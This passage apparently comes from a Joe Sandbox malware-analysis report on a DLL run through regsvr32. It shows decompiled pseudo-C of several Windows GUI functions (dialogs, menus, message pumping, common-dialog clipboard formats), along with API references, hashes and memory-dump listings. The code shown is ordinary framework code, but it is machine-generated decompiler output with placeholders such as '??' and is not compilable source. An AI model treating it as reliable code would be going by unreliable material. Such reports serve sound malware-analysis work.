                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Delete$CloseOpenlstrlen
                                                                                                                • String ID: Apartment$Both$Free$InprocServer32$Insertable$ThreadingModel
                                                                                                                • API String ID: 46240047-3148118246
                                                                                                                • Opcode ID: aafacc9b3fa97a60019edab9fff937d2876df9436f88eb903090ddf3a926996a
                                                                                                                • Instruction ID: 89be5a4af83577de0a95365c2b53f1604eb0eed360df1fb52f4b20aaa0cd6183
                                                                                                                • Opcode Fuzzy Hash: aafacc9b3fa97a60019edab9fff937d2876df9436f88eb903090ddf3a926996a
                                                                                                                • Instruction Fuzzy Hash: 0021B571A00269BBEB51DF91CCC5FAF7BA8EB45B94F124134FE12EA161CB708D11C6A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10036498 Relevance: 24.2, APIs: 16, Instructions: 189windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10036498(intOrPtr* __ecx, void* __ebp, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				char _t60;
				int _t62;
				int* _t64;
				int _t67;
				struct HWND__* _t70;
				struct HWND__* _t76;
				struct HWND__* _t81;
				struct HMENU__* _t83;
				signed int _t92;
				intOrPtr* _t100;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				void* _t113;
				int* _t122;
				intOrPtr* _t123;
				void* _t124;
				signed int _t130;
				signed int _t148;

				_t124 = __ebp;
				_t107 = __ecx;
				_t122 = _a8;
				_t103 = 0;
				_t132 = _t122;
				_t123 = __ecx;
				if(_t122 != 0) {
					L2:
					_t58 =  *((intOrPtr*)( *_t123 + 0x140))();
					_v4 = _t58;
					if(_t58 == _t103) {
						goto L1;
					} else {
						if(_a4 != _t103) {
							_t100 = _t58 + 0x80;
							if( *_t100 != _t103) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t100)) + 0x5c))(_t103);
							}
						}
						_t60 =  *((intOrPtr*)(_t123 + 0x88));
						_push(_t124);
						_a8 = _t103;
						_v12 = _t60;
						if(_t60 == _t103) {
							L16:
							_t122[2] = _a8;
							if(_a4 == _t103) {
								 *(_t123 + 0xb4) = _t103;
								_t62 = GetDlgItem( *(_t123 + 0x20), 0xea21);
								__eflags = _t62;
								_a4 = _t62;
								if(_t62 != 0) {
									_t76 = GetDlgItem( *(_t123 + 0x20), 0xe900);
									__eflags = _t76;
									if(_t76 != 0) {
										SetWindowLongA(_t76, 0xfffffff4, 0xea21);
									}
									SetWindowLongA(_a4, 0xfffffff4, 0xe900);
								}
								__eflags = _t122[1];
								if(_t122[1] != 0) {
									InvalidateRect( *(_t123 + 0x20), 0, 1);
									SetMenu( *(_t123 + 0x20), _t122[1]);
								}
								_t64 = _v4 + 0x80;
								__eflags =  *_t64;
								if( *_t64 != 0) {
									 *((intOrPtr*)( *( *_t64) + 0x5c))(1);
								}
								 *((intOrPtr*)( *_t123 + 0x148))(1);
								_t67 =  *_t122;
								__eflags = _t67 - 0xe900;
								if(_t67 != 0xe900) {
									_v0 = GetDlgItem( *(_t123 + 0x20), _t67);
								}
								ShowWindow(_v0, 5);
								 *(_t123 + 0x60) = _t122[5];
								_t70 = E10034CE4(1);
								L36:
								return _t70;
							}
							 *(_t123 + 0xb4) = _t122[4];
							E10034CE4(_t103);
							_t81 = GetDlgItem( *(_t123 + 0x20),  *_t122);
							_v0 = _t81;
							ShowWindow(_t81, _t103);
							_t83 = GetMenu( *(_t123 + 0x20));
							_t122[1] = _t83;
							if(_t83 != _t103) {
								InvalidateRect( *(_t123 + 0x20), _t103, 1);
								SetMenu( *(_t123 + 0x20), _t103);
								_t33 = _t123 + 0xd0;
								 *_t33 =  *(_t123 + 0xd0) & 0xfffffffe;
								_t148 =  *_t33;
							}
							_t122[5] =  *(_t123 + 0x60);
							 *(_t123 + 0x60) = _t103;
							E10035469(_t123, _t148, 0x7915);
							if( *_t122 == 0xe900) {
								L22:
								_t70 = _a4;
								goto L23;
							} else {
								_t70 = GetDlgItem( *(_t123 + 0x20), 0xe900);
								L23:
								if(_t70 != 0) {
									_t70 = SetWindowLongA(_t70, 0xfffffff4, 0xea21);
								}
								goto L36;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t113 = _t123 + 0x84;
							_t106 =  *((intOrPtr*)(E10012115( &_v12)));
							if(_t106 == 0) {
								break;
							}
							_t92 = GetDlgCtrlID( *(_t106 + 0x20)) & 0x0000ffff;
							_v8 = _t92;
							if(_t92 - 0xe800 <= 0x1f) {
								_t130 = 1 << _t92 - 0xe800;
								if( *((intOrPtr*)( *_t106 + 0x154))() != 0) {
									_a8 = _a8 | 1;
								}
								if( *((intOrPtr*)( *_t106 + 0x15c))() == 0 || _v8 != 0xe81f) {
									E10035F35(_t123, _t106, _t122[2] & _t130, 1);
								}
							}
							if(_v12 != 0) {
								continue;
							} else {
								_t103 = 0;
								goto L16;
							}
						}
						E1000A069(_t106, _t113, _t122, _t123, __eflags);
						goto L22;
					}
				}
				L1:
				E1000A069(_t103, _t107, _t122, _t123, _t132);
				goto L2;
			}





























                                                                                                                0x10036498
                                                                                                                0x10036498
                                                                                                                0x1003649e
                                                                                                                0x100364a2
                                                                                                                0x100364a4
                                                                                                                0x100364a6
                                                                                                                0x100364a8
                                                                                                                0x100364af
                                                                                                                0x100364b1
                                                                                                                0x100364b9
                                                                                                                0x100364bd
                                                                                                                0x00000000
                                                                                                                0x100364bf
                                                                                                                0x100364c3
                                                                                                                0x100364c5
                                                                                                                0x100364cc
                                                                                                                0x100364d5
                                                                                                                0x100364d5
                                                                                                                0x100364cc
                                                                                                                0x100364d8
                                                                                                                0x100364e0
                                                                                                                0x100364e1
                                                                                                                0x100364e5
                                                                                                                0x100364e9
                                                                                                                0x10036576
                                                                                                                0x1003657e
                                                                                                                0x10036581
                                                                                                                0x10036636
                                                                                                                0x1003663c
                                                                                                                0x1003663e
                                                                                                                0x10036640
                                                                                                                0x10036649
                                                                                                                0x1003664f
                                                                                                                0x10036651
                                                                                                                0x10036653
                                                                                                                0x1003665d
                                                                                                                0x1003665d
                                                                                                                0x1003666a
                                                                                                                0x1003666a
                                                                                                                0x10036670
                                                                                                                0x10036674
                                                                                                                0x1003667d
                                                                                                                0x10036689
                                                                                                                0x10036689
                                                                                                                0x10036693
                                                                                                                0x10036698
                                                                                                                0x1003669b
                                                                                                                0x100366a5
                                                                                                                0x100366a5
                                                                                                                0x100366ae
                                                                                                                0x100366b4
                                                                                                                0x100366b6
                                                                                                                0x100366b8
                                                                                                                0x100366c0
                                                                                                                0x100366c0
                                                                                                                0x100366ca
                                                                                                                0x100366d7
                                                                                                                0x100366da
                                                                                                                0x100366df
                                                                                                                0x100366e6
                                                                                                                0x100366e6
                                                                                                                0x1003658d
                                                                                                                0x10036593
                                                                                                                0x100365a3
                                                                                                                0x100365a7
                                                                                                                0x100365ab
                                                                                                                0x100365b4
                                                                                                                0x100365bc
                                                                                                                0x100365bf
                                                                                                                0x100365c7
                                                                                                                0x100365d1
                                                                                                                0x100365d7
                                                                                                                0x100365d7
                                                                                                                0x100365d7
                                                                                                                0x100365d7
                                                                                                                0x100365e1
                                                                                                                0x100365eb
                                                                                                                0x100365ee
                                                                                                                0x100365fa
                                                                                                                0x10036609
                                                                                                                0x10036609
                                                                                                                0x00000000
                                                                                                                0x100365fc
                                                                                                                0x10036600
                                                                                                                0x1003660d
                                                                                                                0x1003660f
                                                                                                                0x1003661d
                                                                                                                0x1003661d
                                                                                                                0x00000000
                                                                                                                0x1003660f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100364ef
                                                                                                                0x100364ef
                                                                                                                0x100364f4
                                                                                                                0x100364ff
                                                                                                                0x10036503
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10036512
                                                                                                                0x1003651e
                                                                                                                0x10036522
                                                                                                                0x1003652f
                                                                                                                0x1003653b
                                                                                                                0x1003653d
                                                                                                                0x1003653d
                                                                                                                0x1003654d
                                                                                                                0x10036564
                                                                                                                0x10036564
                                                                                                                0x1003654d
                                                                                                                0x1003656e
                                                                                                                0x00000000
                                                                                                                0x10036574
                                                                                                                0x10036574
                                                                                                                0x00000000
                                                                                                                0x10036574
                                                                                                                0x1003656e
                                                                                                                0x10036604
                                                                                                                0x00000000
                                                                                                                0x10036604
                                                                                                                0x100364bd
                                                                                                                0x100364aa
                                                                                                                0x100364aa
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetDlgCtrlID.USER32 ref: 1003650C
                                                                                                                • GetDlgItem.USER32(?,?), ref: 100365A3
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 100365AB
                                                                                                                • GetMenu.USER32 ref: 100365B4
                                                                                                                • InvalidateRect.USER32(00000001,00000000,00000001), ref: 100365C7
                                                                                                                • SetMenu.USER32 ref: 100365D1
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetDlgItem.USER32(0000E900,0000E900), ref: 10036600
                                                                                                                • SetWindowLongA.USER32 ref: 1003661D
                                                                                                                • GetDlgItem.USER32(0000EA21,0000EA21), ref: 1003663C
                                                                                                                • GetDlgItem.USER32(0000E900,0000E900), ref: 1003664F
                                                                                                                • SetWindowLongA.USER32 ref: 1003665D
                                                                                                                • SetWindowLongA.USER32 ref: 1003666A
                                                                                                                • InvalidateRect.USER32(00000001,00000000,00000001), ref: 1003667D
                                                                                                                • SetMenu.USER32 ref: 10036689
                                                                                                                • GetDlgItem.USER32(00000000,00000000), ref: 100366BE
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 100366CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemWindow$LongMenu$InvalidateRectShow$CtrlException@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 4160985441-0
                                                                                                                • Opcode ID: 017ece0ee0ca91853db6539d47dc82f8072cbc3049108b4c43f3cf731b890b4e
                                                                                                                • Instruction ID: 54e0ea85a30db0f840d0658cc435978594878730bfb9ef9f52a14b7152f25a01
                                                                                                                • Opcode Fuzzy Hash: 017ece0ee0ca91853db6539d47dc82f8072cbc3049108b4c43f3cf731b890b4e
                                                                                                                • Instruction Fuzzy Hash: 056169756007019FEB11DF64CC89A6AB7E5FF49386F004A6DF19A9A2A0DB30E854CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100270E7 Relevance: 24.2, APIs: 16, Instructions: 180windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E100270E7(intOrPtr* __ecx, struct tagMSG* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				struct tagMSG _v44;
				int _t29;
				struct HWND__* _t32;
				int _t45;
				long _t59;
				intOrPtr _t63;
				int _t64;
				struct HWND__* _t68;
				struct HWND__* _t76;
				struct tagMSG* _t77;

				_t77 = _a4;
				_t29 = _t77->message;
				_v8 = __ecx;
				if(_t29 == 0x367 || _t29 == 0x100 && _t77->wParam == 0x1b) {
					_push(1);
					_push(_t29);
					_push(_t29);
					_push(0);
					goto L37;
				} else {
					if(_t29 < 0x200 || _t29 > 0x209) {
						if(_t29 < 0xa0 || _t29 > 0xa9) {
							if(_t29 == 0x112 || _t29 >= 0x100 && _t29 <= 0x109) {
								_t32 = GetCapture();
								_t76 = 0;
								if(_t32 == 0) {
									L29:
									if(PeekMessageA(_t77, _t76, _t77->message, _t77->message, _t76) == 0) {
										goto L35;
									}
									GetMessageA(_t77, _t76, _t77->message, _t77->message);
									_push(_t77);
									if( *((intOrPtr*)( *_v8 + 0x100))() != 0) {
										goto L35;
									}
									TranslateMessage(_t77);
									_t45 = _t77->message;
									if(_t45 == 0x112 || _t45 >= 0x104 && _t45 <= 0x107) {
										goto L34;
									} else {
										goto L35;
									}
								}
								ReleaseCapture();
								do {
								} while (PeekMessageA( &_v44, 0, 0x200, 0x209, 3) != 0);
								goto L29;
							} else {
								if(PeekMessageA(_t77, 0, _t29, _t29, 1) == 0) {
									goto L8;
								}
								goto L20;
							}
						} else {
							goto L7;
						}
					} else {
						L7:
						_t68 = L10026FD8(_v8, _t77->pt, _t77->pt.y,  &_a4);
						_t76 = 0;
						if(_t68 != 0) {
							if(_a4 == 0) {
								PeekMessageA(_t77, 0, _t77->message, _t77->message, 1);
								L20:
								DispatchMessageA(_t77);
								goto L8;
							}
							if(_t77->message == 0x201) {
								_t59 = SendMessageA(_t68, 0x84, 0, (_t77->pt.y & 0x0000ffff) << 0x00000010 | _t77->pt & 0x0000ffff);
								if(_t59 == 5 || _t59 == 3) {
									ReleaseCapture();
									GetMessageA(_t77, _t76, 0xa1, 0xa1);
									L34:
									DispatchMessageA(_t77);
									L35:
									GetCursorPos( &_v16);
									L10026FD8(_v8, _v16.x, _v16.y, _t76);
									goto L8;
								} else {
									if(_t59 != 1) {
										_t63 = L10026E3E(_t59);
									} else {
										_t63 = L10026DD0(_t68, _t77->pt, _t77->pt.y);
									}
									_push(1);
									 *_a8 = _t63;
									_t64 = _t77->message;
									_push(_t64);
									_push(_t64);
									_push(_t76);
									L37:
									PeekMessageA(_t77, ??, ??, ??, ??);
									return 0;
								}
							}
							PeekMessageA(_t77, 0, _t77->message, _t77->message, 1);
						}
						L8:
						return 1;
					}
				}
			}















                                                                                                                0x100270ef
                                                                                                                0x100270f2
                                                                                                                0x100270fb
                                                                                                                0x100270fe
                                                                                                                0x100272cc
                                                                                                                0x100272ce
                                                                                                                0x100272cf
                                                                                                                0x100272d0
                                                                                                                0x00000000
                                                                                                                0x10027117
                                                                                                                0x1002711c
                                                                                                                0x1002712a
                                                                                                                0x1002720a
                                                                                                                0x1002722e
                                                                                                                0x1002723a
                                                                                                                0x1002723e
                                                                                                                0x1002725d
                                                                                                                0x10027269
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027272
                                                                                                                0x1002727d
                                                                                                                0x10027286
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027289
                                                                                                                0x1002728f
                                                                                                                0x10027297
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027297
                                                                                                                0x10027240
                                                                                                                0x10027246
                                                                                                                0x10027259
                                                                                                                0x00000000
                                                                                                                0x10027217
                                                                                                                0x10027226
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002722c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002713b
                                                                                                                0x1002713b
                                                                                                                0x1002714d
                                                                                                                0x1002714f
                                                                                                                0x10027153
                                                                                                                0x10027160
                                                                                                                0x100271f3
                                                                                                                0x100271f9
                                                                                                                0x100271fa
                                                                                                                0x00000000
                                                                                                                0x100271fa
                                                                                                                0x1002716d
                                                                                                                0x10027195
                                                                                                                0x1002719e
                                                                                                                0x100271d0
                                                                                                                0x100271df
                                                                                                                0x100272a7
                                                                                                                0x100272a8
                                                                                                                0x100272ae
                                                                                                                0x100272b2
                                                                                                                0x100272c2
                                                                                                                0x00000000
                                                                                                                0x100271a5
                                                                                                                0x100271a8
                                                                                                                0x100271c9
                                                                                                                0x100271aa
                                                                                                                0x100271b1
                                                                                                                0x100271b1
                                                                                                                0x100271b9
                                                                                                                0x100271bb
                                                                                                                0x100271bd
                                                                                                                0x100271c0
                                                                                                                0x100271c1
                                                                                                                0x100271c2
                                                                                                                0x100272d2
                                                                                                                0x100272d3
                                                                                                                0x00000000
                                                                                                                0x100272d9
                                                                                                                0x1002719e
                                                                                                                0x10027178
                                                                                                                0x10027178
                                                                                                                0x10027155
                                                                                                                0x00000000
                                                                                                                0x10027157
                                                                                                                0x1002711c

                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000201,00000201,00000001), ref: 10027178
                                                                                                                • SendMessageA.USER32 ref: 10027195
                                                                                                                • ReleaseCapture.USER32 ref: 100271D0
                                                                                                                • GetMessageA.USER32 ref: 100271DF
                                                                                                                • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 100271F3
                                                                                                                • DispatchMessageA.USER32 ref: 100271FA
                                                                                                                • DispatchMessageA.USER32 ref: 100272A8
                                                                                                                • GetCursorPos.USER32(?), ref: 100272B2
                                                                                                                • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 100272D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 597789953-0
                                                                                                                • Opcode ID: 48c5a11eb3a8d3d632750daefe0e14eb920db7b13074f27541598bdfc59b2dac
                                                                                                                • Instruction ID: 0133134a9c7e2fbc1140e53e7cb55acdd5b0000d3e4746bd5cbf52369a1aa7df
                                                                                                                • Opcode Fuzzy Hash: 48c5a11eb3a8d3d632750daefe0e14eb920db7b13074f27541598bdfc59b2dac
                                                                                                                • Instruction Fuzzy Hash: 6351BD34A00615FBEB21DBA4ED88EAF37BDFF8A741F900419F94AD2190D774E9948721
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003FF42 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 127registryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1003FF42(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(0x1000a083);
					_t54 = 0x100bdc04;
					_t68 = E10020A61(__ebx, 0x100bdc04, 0, _t67, __eflags);
					__eflags = _t68;
					if(__eflags == 0) {
						E1000A069(__ebx, 0x100bdc04, 0, _t68, __eflags);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E10014011(_t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							L10014FB7( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x100bdf30; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E10014011(_t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E100203AA(_t70, 0x1009eb24);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x100bdf24; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x100bdf28; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x100bdf20; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x100bdf2c; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x1c4; // 0x1c4
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
								goto L26;
							}
							_t40 = E10037F5D(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x100bdf20 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x100bdf24 = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x100bdf28 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x100bdf2c = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x100bdf30 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x100bdf34 = _t46;
						_push(_a12);
						_t31 = E1001B5C0(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

















                                                                                                                0x1003ff42
                                                                                                                0x1003ff4b
                                                                                                                0x1003ff54
                                                                                                                0x1003ff55
                                                                                                                0x1003ff5a
                                                                                                                0x1003ff64
                                                                                                                0x1003ff66
                                                                                                                0x1003ff68
                                                                                                                0x1003ff6a
                                                                                                                0x1003ff6a
                                                                                                                0x1003ff6f
                                                                                                                0x1003ff72
                                                                                                                0x1003ff7c
                                                                                                                0x1003ff7e
                                                                                                                0x1003ff83
                                                                                                                0x1003ff86
                                                                                                                0x1003ff8b
                                                                                                                0x1003ff8b
                                                                                                                0x1003ff7e
                                                                                                                0x1003ff8e
                                                                                                                0x1003ff8f
                                                                                                                0x1003ff97
                                                                                                                0x1003ff99
                                                                                                                0x1003fffd
                                                                                                                0x10040008
                                                                                                                0x100400ca
                                                                                                                0x100400d5
                                                                                                                0x100400dd
                                                                                                                0x100400dd
                                                                                                                0x00000000
                                                                                                                0x100400dd
                                                                                                                0x1004000e
                                                                                                                0x10040010
                                                                                                                0x1004001e
                                                                                                                0x1004001e
                                                                                                                0x10040024
                                                                                                                0x100400b2
                                                                                                                0x100400b2
                                                                                                                0x00000000
                                                                                                                0x100400b2
                                                                                                                0x10040032
                                                                                                                0x10040034
                                                                                                                0x10040036
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004003f
                                                                                                                0x10040044
                                                                                                                0x10040046
                                                                                                                0x10040058
                                                                                                                0x10040058
                                                                                                                0x1004005e
                                                                                                                0x1004006f
                                                                                                                0x10040075
                                                                                                                0x10040091
                                                                                                                0x10040097
                                                                                                                0x100400b6
                                                                                                                0x100400bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100400c2
                                                                                                                0x00000000
                                                                                                                0x100400c2
                                                                                                                0x1004009e
                                                                                                                0x1004009e
                                                                                                                0x100400ac
                                                                                                                0x00000000
                                                                                                                0x100400ac
                                                                                                                0x1004007a
                                                                                                                0x1004007a
                                                                                                                0x10040080
                                                                                                                0x10040086
                                                                                                                0x1004008c
                                                                                                                0x00000000
                                                                                                                0x1004008c
                                                                                                                0x10040067
                                                                                                                0x00000000
                                                                                                                0x10040067
                                                                                                                0x1004004a
                                                                                                                0x1004004f
                                                                                                                0x10040056
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10040056
                                                                                                                0x10040012
                                                                                                                0x10040018
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ff9b
                                                                                                                0x1003ffad
                                                                                                                0x1003ffb9
                                                                                                                0x1003ffc5
                                                                                                                0x1003ffd1
                                                                                                                0x1003ffdd
                                                                                                                0x1003ffe2
                                                                                                                0x1003ffe4
                                                                                                                0x1003ffe7
                                                                                                                0x1003ffec
                                                                                                                0x1003fff3
                                                                                                                0x100400de
                                                                                                                0x00000000
                                                                                                                0x100400df
                                                                                                                0x1003ff99
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1003FFA6
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1003FFB2
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1003FFBE
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1003FFCA
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1003FFD6
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1003FFE2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
